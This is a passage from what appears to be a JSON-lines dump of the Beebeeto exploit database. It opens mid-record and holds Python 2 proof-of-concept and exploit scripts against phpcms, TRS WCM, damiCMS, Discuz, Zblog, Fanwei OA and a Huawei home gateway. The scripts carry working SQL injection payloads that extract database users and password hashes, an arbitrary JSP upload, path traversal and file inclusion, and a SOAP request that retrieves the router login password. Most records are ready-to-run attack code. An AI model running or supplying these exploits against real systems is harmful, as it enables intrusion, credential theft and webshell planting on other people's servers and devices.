('/index.php?m=menber&c=index&a=login')\r\n verify_url = args['options']['target'] + payload\r\n data = (\"dosubmit=1&username=phpcms&password=123456%26username%3d%2527%2b\"\r\n \"union%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml\"\r\n \"(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)\"\r\n \"%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c\"\r\n \"%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527\"\r\n \"%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527\"\r\n \"%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c\"\r\n \"%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f\"\r\n \"%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull\"\r\n \"%252cnull%252cnull%252cnull%252cnull%252cnull%2523\")\r\n req = urllib2.urlopen(verify_url, data)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = req.read()\r\n if \"XPATH syntax\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = args['options']['target']\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n mp = MyPoc()\r\n\r\n pprint(mp.run())\r\n", "desc": "phpcms v9\u7528\u6237\u767b\u5f55\u5904\u5b58\u5728sql\u6ce8\u5165\u6f0f\u6d1e", "app_name": "phpcms", "id": "poc-2015-0127", "layer4_protocol": null}
{"create_date": "2015-07-29 15:59:11", "name": "TRS wcm 5.2 /wcm/services/ \u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "TRS WCM 6.X GETSHELL,TRS WCM 5.X \u6f0f\u6d1e,\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0124',\r\n 'name': 'TRS wcm 5.2 /wcm/services/ \u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-07-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'trs',\r\n 'vul_version': ['5.2'],\r\n 'type': 'File Upload',\r\n 'tag': ['TRS WCM 6.X GETSHELL', 'TRS WCM 5.X \u6f0f\u6d1e', '\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e', 'jsp'],\r\n 'desc': 'TRS WCM\u7684Web Service\u63d0\u4f9b\u4e86\u5411\u670d\u52a1\u5668\u5199\u5165\u6587\u4ef6\u7684\u65b9\u5f0f\uff0c\u53ef\u4ee5\u76f4\u63a5\u5199jsp\u6587\u4ef6\u83b7\u53d6webshell',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2015-092138',\r\n 'http://www.wooyun.org/bugs/wooyun-2013-034315',],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = '/wcm/services/trs:templateservicefacade?wsdl'\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and 'writeFile' in req.content and 'writeSpecFile' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "TRS WCM\u7684Web Service\u63d0\u4f9b\u4e86\u5411\u670d\u52a1\u5668\u5199\u5165\u6587\u4ef6\u7684\u65b9\u5f0f\uff0c\u53ef\u4ee5\u76f4\u63a5\u5199jsp\u6587\u4ef6\u83b7\u53d6webshell", "app_name": "TRS", "id": "poc-2015-0124", "layer4_protocol": null}
{"create_date": "2015-07-17 13:54:14", "name": "PHPCMS V9 /api.php Authkey \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "saviour", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "PHPCMS\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,Information Disclosure,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n 'poc': {\r\n 'id': 'poc-2015-0123',\r\n 'name': 'PHPCMS V9 /api.php Authkey \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e Exploit',\r\n 'author': 'Saviour',\r\n 'create_date': '2015-07-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPCMS',\r\n 'vul_version': ['V9'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['PHPCMS\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', 'Information Disclosure', 'php'],\r\n 'desc': 'PHPCMS V9 Authkey \u6cc4\u9732',\r\n 'references': ['N/A',],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = ('/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&'\r\n 'key=authkey&cachefile=..\\..\\..\\phpsso_server\\caches\\caches_admin'\r\n '\\caches_data\\\\applist&path=admin')\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] GET: ' + payload\r\n req = requests.get(verify_url)\r\n pathinfo = re.compile(r'aaaaa\\(\\[\",(.*),,,\"\\]\\)')\r\n match = pathinfo.findall(req.content)\r\n if match:\r\n path = match[0]\r\n args['success'] = True\r\n args['poc_ret']['Authkey'] = path\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "phpcms", "id": "poc-2015-0123", "layer4_protocol": null}
{"create_date": "2015-07-03 13:38:25", "name": "Huawei Home Gateway UPnP/1.0 IGD/1.00 Password Disclosure Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u534e\u4e3a\u6f0f\u6d1e,Password Disclosure Vulnerability", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport socket\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import transform_target_ip\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0120',\r\n 'name': 'Huawei Home Gateway UPnP/1.0 IGD/1.00 Password Disclosure Exploit',\r\n 'author': 'tmp',\r\n 'create_date': '2015-07-03',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Huawei',\r\n 'vul_version': ['UPnP/1.0', 'IGD/1.00'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['\u534e\u4e3a\u6f0f\u6d1e', 'Password Disclosure Vulnerability'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.exploit-db.com/exploits/37424/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n # set timeout\r\n timeout = 20\r\n socket.setdefaulttimeout(timeout)\r\n target = transform_target_ip(args['options']['target'])\r\n if args['options']['verbose']:\r\n print '[*] Connecting to: ' + target\r\n # Connect the socket to the port where the server is listening\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n server_address = (target, 80)\r\n sock.connect(server_address)\r\n soap = \"<?xml version=\\\"1.0\\\"?>\"\r\n soap +=\"<s:Envelope xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\r\n soap +=\"<s:Body>\"\r\n soap +=\"<m:GetLoginPassword xmlns:m=\\\"urn:dslforum-org:service:UserInterface:1\\\">\"\r\n soap +=\"</m:GetLoginPassword>\"\r\n soap +=\"</s:Body>\"\r\n soap +=\"</s:Envelope>\"\r\n message = \"POST /UD/?5 HTTP/1.1\\r\\n\"\r\n message += \"SOAPACTION: \\\"urn:dslforum-org:service:UserInterface:1#GetLoginPassword\\\"\\r\\n\"\r\n message += \"Content-Type: text/xml; charset=\\\"utf-8\\\"\\r\\n\"\r\n message += \"Host:\" + target + \"\\r\\n\"\r\n message += \"Content-Length:\" + str(len(soap)) +\"\\r\\n\"\r\n message += \"Expect: 100-continue\\r\\n\"\r\n message += \"Connection: Keep-Alive\\r\\n\\r\\n\"\r\n sock.send(message)\r\n data = sock.recv(1024)\r\n if args['options']['verbose']:\r\n print \"[*] Recieved : \" + data.strip()\r\n sock.send(soap)\r\n data = sock.recv(1024)\r\n data += sock.recv(1024)\r\n r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')\r\n m = r.search(data)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['password'] = m.group(1)\r\n sock.close()\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u534e\u4e3a", "id": "poc-2015-0120", "layer4_protocol": null}
{"create_date": "2015-07-01 17:58:49", "name": "\u6cdb\u5fae OA /tools/SWFUpload/upload.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e PoC", "level": "\u9ad8\u5371", "batchable": 1, "author": "GurdZain", "rank": 4, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "\u6cdb\u5faeoa\u6f0f\u6d1e,/tools/SWFUpload/upload.jsp,File Upload,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0117',\r\n 'name': '\u6cdb\u5fae OA /tools/SWFUpload/upload.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e PoC',\r\n 'author': 'gurdzain',\r\n 'create_date': '2015-07-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6cdb\u5faeoa',\r\n 'vul_version': ['*'],\r\n 'type': 'File Upload',\r\n 'tag': ['\u6cdb\u5faeoa\u6f0f\u6d1e', '/tools/SWFUpload/upload.jsp', 'File Upload', 'jsp'],\r\n 'desc': '''\r\n http://xxx.xxx.xxx.xxx/tools/SWFUpload/upload.jsp\r\n post:\r\n type=\"file\" name=\"test\"\r\n \u53ef\u4ee5\u65e0\u9700\u767b\u5f55\u76f4\u63a5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-076547'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n target_url = args['options']['target'] + \"/tools/SWFUpload/upload.jsp\"\r\n verify_url = args['options']['target'] + \"/nulltest.jsp\"\r\n files = {'test':('test.jsp', r\"\"\"<%@ page import=\"java.util.*,java.io.*\" %>\r\n <%@ page import=\"java.io.*\"%>\r\n <%\r\n String path=application.getRealPath(request.getRequestURI());\r\n File d=new File(path);\r\n out.println(path);\r\n %>\r\n <% out.println(\"payload=true\");%>\"\"\")}\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + target_url\r\n\r\n req = requests.get(target_url,files=files)\r\n verify_req = requests.get(verify_url)\r\n content = verify_req.content\r\n\r\n if verify_req.status_code == 200 and 'payload=true' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://xxx.xxx.xxx.xxx/tools/SWFUpload/upload.jsp\r\npost:\r\n type=\"file\" name=\"test\"\r\n\u53ef\u4ee5\u65e0\u9700\u767b\u5f55\u76f4\u63a5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6\u3002", "app_name": "Other", "id": "poc-2015-0117", "layer4_protocol": null}
{"create_date": "2015-06-28 17:01:51", "name": "\u5927\u7c73CMS /Web/Lib/Action/ApiAction.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "xyw55", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "damiCMS\u6f0f\u6d1e,ApiAction.class.php\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0116',\r\n 'name': '\u5927\u7c73CMS /Web/Lib/Action/ApiAction.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'xyw55',\r\n 'create_date': '2015-06-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'damiCMS',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['damiCMS\u6f0f\u6d1e', 'ApiAction.class.php\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n damiCMS SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u4f4d\u4e8e/Web/Lib/Action/ApiAction.class.php\uff0c\r\n \u8fc7\u6ee4\u4e0d\u4e25\u5bfc\u81f4\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-097671'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = '''s=/api/ajax_arclist/model/article/field/md5(1)%23'''\r\n verify_url = ('%s/index.php?%s') % (url, payload)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and 'ca4238a0b923820dcc509a6f75849' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n payload = '''s=/api/ajax_arclist/model/article/field/username,userpwd%20from%20dami_member%23'''\r\n verify_url = ('%s/index.php?%s') % (url, payload)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200:\r\n pattern = r'username\":\"(.*?)\",\"userpwd\":\"(.{32})\"}'\r\n m = re.findall(pattern, req.content)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['user'] = []\r\n for x in m:\r\n args['poc_ret']['user'].append(x)\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "damiCMS SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u4f4d\u4e8e/Web/Lib/Action/ApiAction.class.php\uff0c\u8fc7\u6ee4\u4e0d\u4e25\u5bfc\u81f4\u6f0f\u6d1e\u3002", "app_name": "\u5927\u7c73CMS", "id": "poc-2015-0116", "layer4_protocol": null}
{"create_date": "2015-06-25 21:11:56", "name": "Discuz X3.0 full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "JustForeg", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,Information Disclosure,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0114',\r\n 'name': 'Discuz X3.0 full Path Disclosure Vulnerability POC',\r\n 'author': 'JustForeg',\r\n 'create_date': '2015-06-25',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['X3.0'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', 'Information Disclosure', 'php'],\r\n 'desc': 'discuz X3.0 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732',\r\n 'references': ['N/A', ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payloads = [\r\n '/api/addons/zendcheck.php',\r\n '/api/addons/zendcheck52.php',\r\n '/api/addons/zendcheck53.php',\r\n '/source/plugin/mobile/api/1/index.php',\r\n '/source/plugin/mobile/extends/module/dz_digest.php',\r\n '/source/plugin/mobile/extends/module/dz_newpic.php',\r\n '/source/plugin/mobile/extends/module/dz_newreply.php',\r\n '/source/plugin/mobile/extends/module/dz_newthread.php',\r\n ]\r\n args['poc_ret']['file_path'] = []\r\n pathinfo = re.compile(r' in <b>(.*)</b> on line')\r\n for payload in payloads:\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] GET: ' + payload\r\n req = requests.get(verify_url)\r\n match = pathinfo.findall(req.content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(match[0])\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "discuz X3.0 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732", "app_name": "Discuz", "id": "poc-2015-0114", "layer4_protocol": null}
{"create_date": "2015-06-25 11:01:12", "name": "Discuz X2.5 /uc_server/control/admin/db.php \u8def\u5f84\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "pikachu", "rank": 1, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,Information Disclosure,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0113',\r\n 'name': 'Discuz X2.5 /uc_server/control/admin/db.php \u8def\u5f84\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': 'pikachu',\r\n 'create_date': '2015-06-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['X2.5'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', 'Information Disclosure', 'php'],\r\n 'desc': 'discuz X2.5 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732\u3002',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = r'/uc_server/control/admin/db.php'\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] GET: ' + payload\r\n req = requests.get(verify_url)\r\n pathinfo = re.compile(r'not found in <b>(.*)</b> on line')\r\n match = pathinfo.findall(req.content)\r\n if match:\r\n path = match[0]\r\n args['success'] = True\r\n args['poc_ret']['path'] = path\r\n return args\r\n \r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "discuz X2.5 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732\u3002", "app_name": "Discuz", "id": "poc-2015-0113", "layer4_protocol": null}
{"create_date": "2015-06-21 20:38:39", "name": "Git information disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "t0nyhj", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "information disclosure,git\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,git", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0112',\r\n 'name': 'Git information disclosure POC',\r\n 'author': 't0nyhj',\r\n 'create_date': '2015-06-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'N/A',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['information disclosure', 'git\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', 'git'],\r\n 'desc': 'use git incorrect cause site information disclosure',\r\n 'exploit':'https://github.com/lijiejie/GitHack',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-0100762',\r\n 'http://www.beebeeto.com/pdb/poc-2014-0024/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n keyword = ['core','remote','branch']\r\n vul_url = args[\"options\"][\"target\"] + '/.git/config'\r\n if args['options']['verbose']:\r\n print \"[*] Request URL:\", vul_url\r\n resquest = urllib2.Request(vul_url)\r\n response = urllib2.urlopen(resquest)\r\n if response.getcode() != 200:\r\n args[\"success\"] = False\r\n return args\r\n content = response.read()\r\n flag = False\r\n for word in keyword:\r\n if word in content:\r\n flag = True\r\n break\r\n if flag == True:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "use git incorrect cause site information disclosure", "app_name": "Other", "id": "poc-2015-0112", "layer4_protocol": null}
{"create_date": "2015-06-17 14:25:20", "name": "Zblog /zb_install/index.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "user1018", "rank": 4, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "Zblog\u6700\u65b0\u7248\u672c\u6f0f\u6d1e,Zblog \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0111',\r\n 'name': 'Zblog /zb_install/index.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2015-06-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Zblog',\r\n 'vul_version': ['*'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['Zblog\u6700\u65b0\u7248\u672c\u6f0f\u6d1e', 'Zblog \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n \u867d\u7136\u9650\u5236\u4e86\u5fc5\u987b\u4e3a.php\u540e\u7f00\u7684\uff0c\u4f46\u662f\u56e0\u4e3a\u6ca1\u5bf9POST\u8f6c\u4e49\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u622a\u65ad\u540e\u9762\u7684.php\u3002\r\n ''',\r\n 'references': ['http://0day5.com/archives/3213',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n filepath = '/zb_install/index.php'\r\n payload = 'zbloglang=../../zb_system/image/admin/none.gif%00'\r\n verify_url = args['options']['target'] + filepath\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] POST: ' + payload\r\n req = requests.post(verify_url, data=payload)\r\n if 'Cannot use a scalar value' in req.content and req.status_code == 500:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u867d\u7136\u9650\u5236\u4e86\u5fc5\u987b\u4e3a.php\u540e\u7f00\u7684\uff0c\u4f46\u662f\u56e0\u4e3a\u6ca1\u5bf9POST\u8f6c\u4e49\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u622a\u65ad\u540e\u9762\u7684.php\u3002", "app_name": "Z-blog", "id": "poc-2015-0111", "layer4_protocol": null}
